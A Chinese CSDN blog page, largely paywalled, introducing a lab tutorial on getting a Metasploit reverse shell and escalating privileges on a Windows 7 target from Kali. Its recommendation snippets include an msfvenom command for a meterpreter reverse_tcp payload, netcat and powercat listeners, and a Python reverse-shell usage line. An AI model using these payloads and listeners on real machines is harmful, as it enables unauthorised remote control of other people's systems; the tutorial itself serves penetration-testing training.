利用msf实现反弹shell与提权(细节过程秒懂)

最新推荐文章于 2023-11-09 21:33:32 发布
最新推荐文章于 2023-11-09 21:33:32 发布
阅读量6k 收藏 28
点赞数 5
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Naiisii/article/details/112534879
版权
环境攻击机:Kali ip:192.168.50.183靶机:Win7(x64)两者在同一个C段!!!!生成payload首先我们生成一个payload文件,如果靶机是64位的建议生成64位的payload,以免后续提权过程受阻在线快速生成payload网站这里的IP设置为KaliIP,端口不要与其他服务冲突接下来我们需要把payload下载到靶机win7(如果有能者可以直接拖拽进靶机也可以)把下载好的文件放至网页,由靶机win7通过访问网页下载mv reverse.exe /var/
摘要由CSDN通过智能技术生成

环境

攻击机:Kali ip:192.168.50.183
靶机:Win7(x64)
两者在同一个C段!!!!

生成payload

首先我们生成一个payload文件,如果靶机是64位的建议生成64位的payload,以免后续提权过程受阻
在线快速生成payload网站
这里的IP设置为KaliIP,端口不要与其他服务冲突
在这里插入图片描述
接下来我们需要把payload下载到靶机win7(如果有能者可以直接拖拽进靶机也可以)
把下载好的文件放至网页,由靶机win7通过访问网页下载

mv reverse.exe /var/www/html/

记得开启Kali的apache服务,我这里使用的是apache2

最低0.47元/天 解锁文章
未来等你
关注
  • 5
    点赞
  • 28
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Windows下反弹shell的方法
2ed
07-16 1万+
1.powercat反弹shell powercat(https://github.com/besimorhino/powercat )为Powershell版的Netcat,实际上是一个powershell的函数,使用方法类似Netcat 首先攻击者开启监听 nc -lvp 6666 或者使用powercat监听 powercat -l -p 6666 接着在目标机上反弹cmd shell:...
使用MSF进行提权(windows提权、linux提权、wesng使用
最新发布
喜欢Python编程的程序员柚柚呀
02-29 1166
安全焦点,其BugTraq是一个出色的漏洞和exploit数据源,可以通过CVE编号,或者产品信息漏洞直接搜索。将刚才生成的 s.exe 文件上传到服务器(靶机)C:\RECYCLER\s.exe 目录(因为一般C:\RECYCLER\ 目录都有读写权限)选定需要使用的攻击模块之后,你只需要使用简单的命令配置一些参数就能完成针对一个漏洞的测试和利用,将渗透的过程自动化、简单化。如果攻击者对可能导致远程代码执行的漏洞和/或仅具有可用漏洞利用代码的漏洞感兴趣,这将非常有用。为此,可以分别使用​。
cmd反弹shell提权
10-24
cmd反弹shell提权
使用msf进行反弹shell+内网渗透
热门推荐
JSMaster01的博客
12-30 1万+
首先说明一点,反弹shell的前提是该主机能够执行我们的恶意命令 反弹shell的原理与灰鸽子的原理是相似的,就是在靶机上执行一个我们msf精心构造的客户端,使靶机主动回连我们攻击机的某个端口。下面开始说明使用msf进行反弹shell过程。 一、反弹shell: 1.首先使用msf中的msfvenom模块生成一个被控端的客户端文件。这里以Windows 64位为例,具体命令如下:“msfveno...
Windows nc命令下载使用与使用bash建立反弹shell
永远是少年
12-30 3095
今天继续给大家介绍渗透测试相关知识,本文主要内容是Windows nc命令下载使用与使用bash建立反弹shell。 一、nc命令下载 二、nc命令详解 三、建立bash反弹shell详解
python反向连接shell,可穿透防火墙
07-30
python reverse_shell.py 反弹目的ip 3322 反弹目的ip 执行nc -l 3322 即可连结 被控端
利用Metasploit进行Linux提权
01-09
Metasploit 拥有msfpayload 和msfencode 这两个工具,这两个工具不但可以生成exe 型后门,一可以生成网页脚本类型的webshell ,通过生成webshell 然后设置监听器,访问webshell的url,幸运的话可以产生一个session,...
iis 6.0 CVE-2017-7269 Msf 反弹shell
01-23
iis 6.0 CVE-2017-7269 Msf 反弹shell metasploit漏洞测试利用模块
通信与网络中的MSF基于组件的业务框架
11-14
MSF(Microsoft Solutions Framework)提出的基于组件的业务框架是一种设计模式,它主要用于通信与网络领域的业务构建。该框架的核心理念是将复杂的业务逻辑分解为可重用的组件,以便更好地管理和扩展业务。框架包括...
基础电子中的MSF业务框架与IMS的关系
11-14
MSF(Method for System Specification and Development,系统规范与开发方法)是一种在电信行业中广泛采用的业务框架,它旨在提供一个高效、结构化的开发过程,以适应不断变化的市场需求和技术创新。MSF的核心是...
linux系统安装msf过程详解
09-14
在Linux系统中安装Metasploit Framework(MSF)是一个重要的步骤,对于网络安全研究者和渗透测试人员来说,这是必备的工具。以下是一个详尽的安装教程,特别针对阿里云Linux系统。 首先,确保你的系统已经更新到...
内网渗透之Windows反弹shell(三)
墨鱼菜鸡
09-10 330
目录 Windows反弹shell 06Powershell.exe 通过PowerShell发起Powercat攻击 通过Web Delivery反弹shell 通过powershell启动cscript.exe 通过powershell启动bat文件 通过powershell启动exe文件 内网渗透之Windows反弹shell(四)...
Windows提权---MSF/令牌窃取/系统服务权限配置错误提权
qq_40012781的博客
07-02 2292
提权是指把普通用户的权限进行提升至高权限的过程,也叫特权提升
MSF反弹shell原理
weixin_47063945的博客
11-09 245
介绍了MSF反弹shell的原理
使用msf生成木马反弹shell(windows系统)
hmysn的博客
12-23 6788
生成木马进行植入
利用msf进行提权操作是出现timed out:Error running command shell: Rex::TimeoutError Operation timed out.
xcyja的博客
05-10 2410
利用msf进行提权操作是出现timed out: 执行shell命令时报错: Error running command shell: Rex::TimeoutError Operation timed out. 错误原因:发现靶机和攻击机不在一个网段中 解决方法: 将靶机的网络连接方式改为NAT模式 电脑中的ip地址方式改为自动获取 即 两个主机之间能相互ping通 ...
使用MSF反向反弹shell
weixin_45588247的博客
07-20 4595
实验准备: 攻击(攻击者)主机: kali 2020.2 虚拟机 nat 192.168.254.132 反向反弹: 【步骤一】:msfconsole启动,结果如【图1】所示: 【命令】 msfconsole 一、msfconsole(这种没有启用数据库,搜索某些东西会很慢) 二、数据...
Kali使用Metapsloit渗透win10 生成 payload 反弹shell
weixin_45908624的博客
07-19 2355
windows payload 反弹shell
msf反弹shell
07-28
回答: 反弹shell是一种利用Metasploit Framework (MSF)进行攻击的技术。它的原理是在目标主机上执行一个经过精心构造的客户端,使目标主机主动连接攻击者的机器的某个端口。使用MSF进行反弹shell过程如下:首先使用msfvenom模块生成一个被控端的客户端文件,具体命令如下:msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=xxx.xxx.xxx.xxx(攻击机IP) lport=xxxx(监听端口)-f exe -o xx.exe。然后将生成的被控端文件放到目标主机内,并在目标主机内执行。此时,攻击者的机器就可以收到目标主机的session,在MSF中使用sessions命令即可查看当前收到的session,并使用session 1命令获取第一个session的会话,然后使用meterpreter模块中的shell命令即可实现反弹shell。\[1\] #### 引用[.reference_title] - *1* *3* [使用msf进行反弹shell+内网渗透](https://blog.csdn.net/JSMaster01/article/details/85402292)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down1,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [msf反弹shell](https://blog.csdn.net/weixin_34179762/article/details/93196297)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值